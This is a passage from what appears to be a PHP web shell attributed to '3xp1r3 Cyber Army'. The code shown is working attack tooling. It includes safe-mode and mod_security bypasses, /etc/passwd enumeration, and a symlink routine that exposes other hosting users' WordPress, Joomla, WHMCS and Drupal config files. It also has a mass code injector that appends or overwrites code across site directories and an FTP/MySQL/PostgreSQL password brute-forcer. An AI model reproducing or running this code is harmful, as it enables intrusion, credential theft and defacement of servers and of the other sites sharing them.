  1068.         <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
  1069.             <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
  1070.             <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
  1071.             <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
  1072.             <tr><td></td><td><input type='submit' value='submit'></td></tr>
  1073.             </table></form>";
  1074.     function hardRecursiveGlob($path) {
  1075.         if(substr($path, -1) != '/')
  1076.             $path.='/';
  1077.         $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
  1078.         if(is_array($paths)&&@count($paths)) {
  1079.             foreach($paths as $microsoft) {
  1080.                 if(@is_dir($microsoft)){
  1081.                     if($path!=$microsoft)
  1082.                         hardRecursiveGlob($microsoft);
  1083.                 } else {
  1084.                     if(empty($_POST['p2']) || @strpos(file_get_contents($microsoft), $_POST['p2'])!==false)
  1085.                         echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($microsoft)."\", \"view\",\"\")'>".htmlspecialchars($microsoft)."</a><br>";
  1086.                 }
  1087.             }
  1088.         }
  1089.     }
  1090.     if(@$_POST['p3'])
  1091.         hardRecursiveGlob($_POST['c']);
  1092.     echo "</div><br><h1>Search for hash:</h1><div class=content>
  1093.         <form method='post' target='_blank' name='hf'>
  1094.             <input type='text' name='hash' style='width:200px;'><br>
  1095.            <input type='hidden' name='act' value='find'/>
  1096.             <input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
  1097.             <input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
  1098.            <input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
  1099.             <input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
  1100.             <input type='submit' value='toolki.com' onclick=\"document.hf.action='http://toolki.com/';document.hf.submit()\"><br>
  1101.             <input type='submit' value='fopo.com.ar' onclick=\"document.hf.action='http://fopo.com.ar/';document.hf.submit()\"><br>
  1102.             <input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
  1103.         </form></div>";
  1104.     hardFooter();
  1105. }
  1106. function actionSafeMode() {
  1107.     $temp='';
  1108.     ob_start();
  1109.     switch($_POST['p1']) {
  1110.         case 1:
  1111.             $temp=@tempnam($test, 'cx');
  1112.             if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  1113.                 echo @file_get_contents($temp);
  1114.                 unlink($temp);
  1115.             } else
  1116.                 echo 'Sorry... Can\'t open file';
  1117.             break;
  1118.         case 2:
  1119.             $files = glob($_POST['p2'].'*');
  1120.             if( is_array($files) )
  1121.                 foreach ($files as $filename)
  1122.                     echo $filename."\n";
  1123.             break;
  1124.         case 3:
  1125.             $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  1126.             curl_exec($ch);
  1127.             break;
  1128.         case 4:
  1129.             ini_restore("safe_mode");
  1130.             ini_restore("open_basedir");
  1131.             include($_POST['p2']);
  1132.             break;
  1133.         case 5:
  1134.             for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  1135.                 $uid = @posix_getpwuid($_POST['p2']);
  1136.                 if ($uid)
  1137.                     echo join(':',$uid)."\n";
  1138.             }
  1139.             break;
  1140.         case 6:
  1141.             if(!function_exists('imap_open'))break;
  1142.             $stream = imap_open($_POST['p2'], "", "");
  1143.             if ($stream == FALSE)
  1144.                 break;
  1145.             echo imap_body($stream, 1);
  1146.             imap_close($stream);
  1147.             break;
  1148.     }
  1149.     $temp = ob_get_clean();
  1150.     hardHeader();
  1151.     echo '<h1>Safe mode bypass</h1><div class=content>';
  1152.     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value="submit"></form>';
  1153.     if($temp)
  1154.         echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  1155.     echo '</div>';
  1156.     hardFooter();
  1157. }
  1158. function actionLogout() {
  1159.     setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  1160.     die('bye!');
  1161. }
  1162. function actionSelfRemove() {
  1163.     if($_POST['p1'] == 'yes')
  1164.         if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1165.             die('Shell has been removed');
  1166.         else
  1167.             echo 'unlink error!';
  1168.     if($_POST['p1'] != 'yes')
  1169.         hardHeader();
  1170.     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1171.     hardFooter();
  1172. }
  1173.  
  1174. function actionInfect() {
  1175.     hardHeader();
  1176.     echo '<h1>Infect</h1><div class=content>';
  1177.     if($_POST['p1'] == 'infect') {
  1178.         $target=$_SERVER['DOCUMENT_ROOT'];
  1179.             function ListFiles($dir) {
  1180.                 if($dh = opendir($dir)) {
  1181.                     $files = Array();
  1182.                     $inner_files = Array();
  1183.                     while($file = readdir($dh)) {
  1184.                         if($file != "." && $file != "..") {
  1185.                             if(is_dir($dir . "/" . $file)) {
  1186.                                 $inner_files = ListFiles($dir . "/" . $file);
  1187.                                 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1188.                             } else {
  1189.                                 array_push($files, $dir . "/" . $file);
  1190.                             }
  1191.                         }
  1192.                     }
  1193.                     closedir($dh);
  1194.                     return $files;
  1195.                 }
  1196.             }
  1197.             foreach (ListFiles($target) as $key=>$file){
  1198.                 $nFile = substr($file, -4, 4);
  1199.                 if($nFile == ".php" ){
  1200.                     if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
  1201.                         echo "$file<br>";
  1202.                         $i++;
  1203.                     }
  1204.                 }
  1205.             }
  1206.             echo "<font color=red size=14>$i</font>";
  1207.         }else{
  1208.             echo "<form method=post><input type=submit value=Infect name=infet></form>";
  1209.             echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  1210.         }
  1211.     hardFooter();
  1212. }
  1213.  
  1214.  
  1215. function actionSymlink() {
  1216.     hardHeader();
  1217.     echo '<h1>Symlink</h1>';
  1218.     $furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  1219.     $expld = explode('/',$furl );
  1220.     $burl =str_replace(end($expld),'',$furl);  
  1221.    
  1222.     echo '<div class="content"><center>
  1223.                <h3>[ <a href="#" onclick="g(\'symlink\',null,\'website\',null)">Domains</a> ] -
  1224.                    [ <a href="#" onclick="g(\'symlink\',null,\'whole\',null)">Whole Server Symlink<sup style="color:red;text-decoration:blink;">New</sup></a> ] -
  1225.                    [ <a href="#" onclick="g(\'symlink\',null,\'config\',null)">Config files symlink</a> ]</h3></center>';
  1226.    
  1227.     if(isset($_POST['p1']) && $_POST['p1']=='website')
  1228.     {
  1229.         echo "<center>";
  1230.         $d0mains = @file("/etc/named.conf");
  1231.         if(!$d0mains){
  1232.             echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1233.         } else {
  1234.             echo "<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";
  1235.            
  1236.             $unk = array();
  1237.             foreach($d0mains as $d0main){
  1238.                 if(@eregi("zone",$d0main)){
  1239.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1240.                     flush();
  1241.                     if(strlen(trim($domains[1][0])) > 2){
  1242.                         $unk[] = $domains[1][0];
  1243.                         flush();
  1244.                        
  1245.                     }
  1246.                 }
  1247.             }
  1248.             $count=1;
  1249.             $unk = array_unique($unk);
  1250.             $l=0;
  1251.             foreach($unk as $d){
  1252.                 $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
  1253.                 echo "<tr".($l?' class=l1':'')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user['name']."</td></tr>";
  1254.                 flush();
  1255.                 $count++;
  1256.                 $l=$l?0:1;
  1257.             }
  1258.             echo "</table>";
  1259.         }
  1260.         echo "</center>";
  1261.     }
  1262.  
  1263.     if(isset($_POST['p1']) && $_POST['p1']=='whole')
  1264.     {
  1265.         echo "<center>";
  1266.         @mkdir('3ca_sym',0777);
  1267.         $hdt  = "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
  1268.         $hfp =@fopen ('3ca_sym/.htaccess','w');
  1269.         fwrite($hfp ,$hdt);
  1270.         if(function_exists('symlink')) {
  1271.             @symlink('/','3ca_sym/root');
  1272.         }
  1273.         $d0mains = @file('/etc/named.conf');
  1274.         if(!$d0mains) {
  1275.             echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1276.             echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
  1277.             $dt = file('/etc/passwd');
  1278.             $l=0;
  1279.             foreach($dt as $d) {
  1280.                 $r = explode(':',$d);
  1281.                 if(strpos($r[5],'home')) {
  1282.                     echo "<tr".($l?' class=l1':'')."><td>".$j."</td><td>---</td><td>".$r[0]."</td><td><a href='3ca_sym/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
  1283.                     $l=$l?0:1;
  1284.                     $j++;
  1285.                 }
  1286.             }            
  1287.             echo '</table>';
  1288.         } else {
  1289.             echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
  1290.             $count=1;
  1291.             $mck = array();
  1292.             foreach($d0mains as $d0main){
  1293.                 if(@eregi('zone',$d0main)){
  1294.                     preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1295.                     flush();
  1296.                     if(strlen(trim($domain[1][0])) >2){
  1297.                         $mck[] = $domain[1][0];
  1298.                     }
  1299.                 }
  1300.             }
  1301.             $mck = array_unique($mck);
  1302.             $usr = array();
  1303.             $dmn = array();
  1304.             foreach($mck as $o) {
  1305.                 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1306.                 $usr[] = $infos['name'];
  1307.                 $dmn[] = $o;
  1308.             }
  1309.             array_multisort($usr,$dmn);
  1310.             $dt = file('/etc/passwd');
  1311.             $passwd = array();
  1312.             foreach($dt as $d) {
  1313.                 $r = explode(':',$d);
  1314.                 if(strpos($r[5],'home')) {
  1315.                     $passwd[$r[0]] = $r[5];
  1316.                 }
  1317.             }
  1318.             $l=0;
  1319.             $j=1;
  1320.             foreach($usr as $r) {
  1321.                 echo "<tr".($l?' class=l1':'')."><td>".$count++."</td>
  1322.                                                 <td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
  1323.                                                 <td>'.$r."</td>
  1324.                                                 <td><a href='3ca_sym/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
  1325.                 flush();
  1326.                 $l=$l?0:1;
  1327.                 $j++;
  1328.             }
  1329.             echo '</table>';
  1330.         }
  1331.         echo "</center>";    
  1332.     }
  1333.  
  1334.     if(isset($_POST['p1']) && $_POST['p1']=='config')
  1335.     {
  1336.         echo "<center>";
  1337.         @mkdir('3ca_sym',0777);
  1338.         $hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1339.         $hfp = @fopen ('3ca_sym/.htaccess','w');
  1340.         @fwrite($hfp ,$hdt);
  1341.         if(function_exists('symlink')) {
  1342.             @symlink('/','3ca_sym/root');
  1343.         }
  1344.         $d0mains = @file('/etc/named.conf');
  1345.         if(!$d0mains) {
  1346.             echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1347.         } else {
  1348.             echo "<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domain </th<th> User </th>><th> Script </th></tr>";
  1349.             $count = 1;
  1350.             $l=0;
  1351.             foreach($d0mains as $d0main){
  1352.                 if(@eregi('zone',$d0main)){
  1353.                     preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1354.                     flush();
  1355.                     if(strlen(trim($domain[1][0]))>2){
  1356.                         $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));
  1357.  
  1358.                         $c1 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/wp-config.php';
  1359.                         $ch01 = get_headers($c1);
  1360.                         $cf01 = $ch01[0];
  1361.                         $c2 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
  1362.                         $ch02 = get_headers($c2);
  1363.                         $cf02 = $ch02[0];
  1364.                         $c3 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/configuration.php';
  1365.                         $ch03 = get_headers($c3);
  1366.                         $cf03 = $ch03[0];
  1367.                         $c4 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
  1368.                         $ch04 = get_headers($c4);
  1369.                         $cf04 = $ch04[0];
  1370.                         $c5 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/includes/config.php';
  1371.                         $ch05 = get_headers($c5);
  1372.                         $cf05 = $ch05[0];
  1373.                         $c6 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
  1374.                         $ch06 = get_headers($c6);
  1375.                         $cf06 = $ch06[0];
  1376.                         $c7 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
  1377.                         $ch07 = get_headers($c7);
  1378.                         $cf07 = $ch07[0];
  1379.                         $c8 = $burl.'/3ca_sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
  1380.                         $ch08 = get_headers($c8);
  1381.                         $cf08 = $ch08[0];
  1382.                         $c9 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
  1383.                         $ch09 = get_headers($c9);
  1384.                         $cf09 = $ch09[0];
  1385.                         $c10 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
  1386.                         $ch10 = get_headers($c10);
  1387.                         $cf10 = $ch10[0];
  1388.                         $c11 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/submitticket.php';
  1389.                         $ch11 = get_headers($c11);
  1390.                         $cf11 = $ch11[0];
  1391.                         $c12 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
  1392.                         $ch12 = get_headers($c12);
  1393.                         $cf12 = $ch12[0];
  1394.                         $c13 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
  1395.                         $ch13 = get_headers($c13);
  1396.                         $cf13 = $ch13[0];
  1397.                         $c14 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
  1398.                         $ch14 = get_headers($c14);
  1399.                         $cf14 = $ch14[0];
  1400.                         $c15 = $burl.'/3ca_sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
  1401.                         $ch15 = get_headers($c15);
  1402.                         $cf15 = $ch15[0];
  1403.                        
  1404.                         $out = '&nbsp;';
  1405.                         if(strpos($cf01,'200') == true)                                    {   $out = "<a href='".$c1."' target='_blank'>Wordpress</a>";   }
  1406.                         elseif(strpos($cf02,'200') == true)                                {   $out = "<a href='".$c2."' target='_blank'>Wordpress</a>";   }
  1407.                         elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) {   $out = " <a href='".$c11."' target='_blank'>WHMCS</a>";     }
  1408.                         elseif(strpos($cf09,'200') == true)                                {   $out = " <a href='".$c9."' target='_blank'>WHMCS</a>";      }
  1409.                         elseif(strpos($cf10,'200') == true)                                {   $out = " <a href='".$c10."' target='_blank'>WHMCS</a>";     }
  1410.                         elseif(strpos($cf03,'200') == true)                                {   $out = " <a href='".$c3."' target='_blank'>Joomla</a>";     }
  1411.                         elseif(strpos($cf04,'200') == true)                                {   $out = " <a href='".$c4."' target='_blank'>Joomla</a>";     }
  1412.                         elseif(strpos($cf05,'200') == true)                                {   $out = " <a href='".$c5."' target='_blank'>vBulletin</a>";  }
  1413.                         elseif(strpos($cf06,'200') == true)                                {   $out = " <a href='".$c6."' target='_blank'>vBulletin</a>";  }
  1414.                         elseif(strpos($cf07,'200') == true)                                {   $out = " <a href='".$c7."' target='_blank'>vBulletin</a>";  }
  1415.                         elseif(strpos($cf08,'200') == true)                                {   $out = " <a href='".$c7."' target='_blank'>Client Area</a>";  }
  1416.                         elseif(strpos($cf12,'200') == true)                                {   $out = " <a href='".$c7."' target='_blank'>Client Area</a>";  }
  1417.                         elseif(strpos($cf13,'200') == true)                                {   $out = " <a href='".$c7."' target='_blank'>osCommerce/Zen Cart</a>";  }
  1418.                         elseif(strpos($cf14,'200') == true)                                {   $out = " <a href='".$c7."' target='_blank'>Magento</a>";  }
  1419.                         elseif(strpos($cf15,'200') == true)                                {   $out = " <a href='".$c7."' target='_blank'>Drupal</a>";  }
  1420.                         else {
  1421.                             continue;
  1422.                         }
  1423.                         echo '<tr'.($l?' class=l1':'').'><td>'.$count++.'</td><td><a href=http://www.'.$domain[1][0].'/>'.$domain[1][0].'</a></td><td>'.$user['name'].'</td><td>'.$out.'</td></tr>';
  1424.                         flush();
  1425.                         $l=$l?0:1;
  1426.                     }
  1427.                 }
  1428.             }
  1429.             echo "</table>";
  1430.         }
  1431.         echo "</center>";  
  1432.     }
  1433.     echo "</div>";
  1434.     hardFooter();
  1435. }
  1436.  
  1437. function actionBypass() {
  1438.     hardHeader();
  1439.     echo '<h1>Safe Mode</h1>';
  1440.     echo '<div class="content">';
  1441.     echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  1442.     echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
  1443.     if(!empty($_POST['p2']) && isset($_POST['p2']))
  1444.     {
  1445.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1446.         fwrite($fil,'<IfModule mod_security.c>
  1447.            Sec------Engine Off
  1448.            Sec------ScanPOST Off
  1449.            </IfModule>');
  1450.         fclose($fil);
  1451.    }
  1452.    if(!empty($_POST['p1'])&& isset($_POST['p1']))
  1453.    {
  1454.         $fil=fopen($GLOBALS['cwd']."php.ini","w");
  1455.         fwrite($fil,'safe_mode=OFF
  1456.            disable_functions=NONE');
  1457.         fclose($fil);
  1458.     }
  1459.     if(!empty($_POST['p3']) && isset($_POST['p3']))
  1460.     {
  1461.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1462.         fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  1463.        AddType application/x-httpd-cgi .sh
  1464.        AddHandler cgi-script .pl
  1465.        AddHandler cgi-script .pl');
  1466.         fclose($fil);
  1467.     }
  1468.     echo "<br><br /><br /></div>";
  1469.     echo '</div>';
  1470.     hardFooter();
  1471. }
  1472.  
  1473. function actionInjector(){
  1474.     hardHeader();
  1475.     echo '<h1>Mass Code Injector</h1>';
  1476.     echo '<div class="content">';
  1477.    
  1478.     if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
  1479.     function get_structure($path,$depth) {
  1480.         global $DS;
  1481.         $res = array();
  1482.         if(in_array(0, $depth)) { $res[] = $path; }
  1483.         if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
  1484.             $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
  1485.             if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
  1486.         }
  1487.         if(in_array(2, $depth) or in_array(3, $depth)) {
  1488.             $tmp2 = array();
  1489.             foreach($tmp1 as $t){
  1490.                 $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
  1491.                 $tmp2 = array_merge($tmp2, $tp2);
  1492.             }
  1493.             if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
  1494.         }
  1495.         if(in_array(3, $depth)) {
  1496.             $tmp3 = array();
  1497.             foreach($tmp2 as $t){
  1498.                 $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
  1499.                 $tmp3 = array_merge($tmp3, $tp3);
  1500.             }
  1501.             $res = array_merge($res,$tmp3);
  1502.         }
  1503.         return $res;
  1504.     }
  1505.  
  1506.     if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
  1507.         $name = $_POST['name'] ? $_POST['name'] : '*';
  1508.         $type = $_POST['type'] ? $_POST['type'] : 'html';
  1509.         $path = $_POST['path'] ? $_POST['path'] : getcwd();
  1510.         $code = $_POST['code'] ? $_POST['code'] : '3xp1r3 Cyber Army';
  1511.         $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
  1512.         $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
  1513.         $dt = get_structure($path,$depth);
  1514.         foreach ($dt as $d) {
  1515.             if($mode == 'a') {
  1516.                 if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
  1517.                     echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  1518.                 } else {
  1519.                     echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  1520.                 }
  1521.             } else {
  1522.                 if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
  1523.                     echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  1524.                 } else {
  1525.                     echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  1526.                 }
  1527.             }        
  1528.         }
  1529.     } else {
  1530.         echo '<form method="post" action="">
  1531.                <table align="center">
  1532.                    <tr>
  1533.                        <td>Directory : </td>
  1534.                        <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
  1535.                    </tr>
  1536.                    <tr>
  1537.                        <td class="title">Mode : </td>
  1538.                        <td>
  1539.                            <select style="width: 100px;" name="mode" class="box">
  1540.                                <option value="a">Apender</option>
  1541.                                <option value="w">Overwriter</option>
  1542.                            </select>
  1543.                        </td>
  1544.                    </tr>
  1545.                    <tr>
  1546.                        <td class="title">File Name & Type : </td>
  1547.                        <td>
  1548.                            <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
  1549.                            <select style="width: 100px;" name="type" class="box">
  1550.                            <option value="html">HTML</option>
  1551.                            <option value="htm">HTM</option>
  1552.                            <option value="php" selected="selected">PHP</option>
  1553.                            <option value="asp">ASP</option>
  1554.                            <option value="aspx">ASPX</option>
  1555.                            <option value="xml">XML</option>
  1556.                            <option value="txt">TXT</option>
  1557.                        </select></td>
  1558.                    </tr>
  1559.                    <tr>
  1560.                        <td class="title">Code Inject Depth : </td>
  1561.                        <td>
  1562.                            <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
  1563.                            <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
  1564.                            <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
  1565.                            <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
  1566.                        </td>
  1567.                    </tr>        
  1568.                    <tr>
  1569.                        <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
  1570.                    </tr>                        
  1571.                    <tr>
  1572.                        <td colspan="2" style="text-align: center;">
  1573.                            <input type="hidden" name="a" value="Injector">
  1574.                            <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1575.                            <input type="hidden" name="p1">
  1576.                            <input type="hidden" name="p2">
  1577.                            <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1578.                            <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
  1579.                    </tr>
  1580.                </table>
  1581.        </form>';
  1582.     }
  1583.     echo '</div>';
  1584.     hardFooter();
  1585. }
  1586.  
  1587. function actionBruteforce() {
  1588.     hardHeader();
  1589.     if( isset($_POST['proto']) ) {
  1590.         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  1591.         if( $_POST['proto'] == 'ftp' ) {
  1592.             function bruteForce($ip,$port,$login,$pass) {
  1593.                 $fp = @ftp_connect($ip, $port?$port:21);
  1594.                 if(!$fp) return false;
  1595.                 $res = @ftp_login($fp, $login, $pass);
  1596.                 @ftp_close($fp);
  1597.                 return $res;
  1598.             }
  1599.         } elseif( $_POST['proto'] == 'mysql' ) {
  1600.             function bruteForce($ip,$port,$login,$pass) {
  1601.                 $res = @mysqli_connect($ip.':'.($port?$port:3306), $login, $pass);
  1602.                 @mysqli_close($res);
  1603.                 return $res;
  1604.             }
  1605.         } elseif( $_POST['proto'] == 'pgsql' ) {
  1606.             function bruteForce($ip,$port,$login,$pass) {
  1607.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
  1608.                 $res = @pg_connect($str);
  1609.                 @pg_close($res);
  1610.                 return $res;
  1611.             }
  1612.         }
  1613.         $success = 0;
  1614.         $attempts = 0;
  1615.         $server = explode(":", $_POST['server']);
  1616.         if($_POST['type'] == 1) {
  1617.             $temp = @file('/etc/passwd');
  1618.             if( is_array($temp) )
  1619.                 foreach($temp as $line) {
  1620.                     $line = explode(":", $line);
  1621.                     ++$attempts;
  1622.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  1623.                         $success++;
  1624.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  1625.                     }
  1626.                     if(@$_POST['reverse']) {
  1627.                         $tmp = "";
  1628.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  1629.                             $tmp .= $line[0][$i];
  1630.                         ++$attempts;
  1631.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  1632.                             $success++;
  1633.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  1634.                         }
  1635.                     }
  1636.                 }
  1637.         } elseif($_POST['type'] == 2) {
  1638.             $temp = @file($_POST['dict']);
  1639.             if( is_array($temp) )
  1640.                 foreach($temp as $line) {
  1641.                     $line = trim($line);
  1642.                     ++$attempts;
  1643.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  1644.                         $success++;
  1645.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  1646.                     }
  1647.                 }
  1648.         }
  1649.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1650.     }
  1651.     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  1652.         .'<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>'
  1653.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  1654.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  1655.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  1656.         .'<input type=hidden name=ne  value="">'
  1657.         .'<span>Server:port</span></td>'
  1658.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  1659.         .'<tr><td><span>Brute type</span></td>'
  1660.         .'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>'
  1661.         .'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>'
  1662.         .'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>'
  1663.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  1664.         .'<td><input type=text name=login value="root"></td></tr>'
  1665.         .'<tr><td><span>Dictionary</span></td>'
  1666.         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
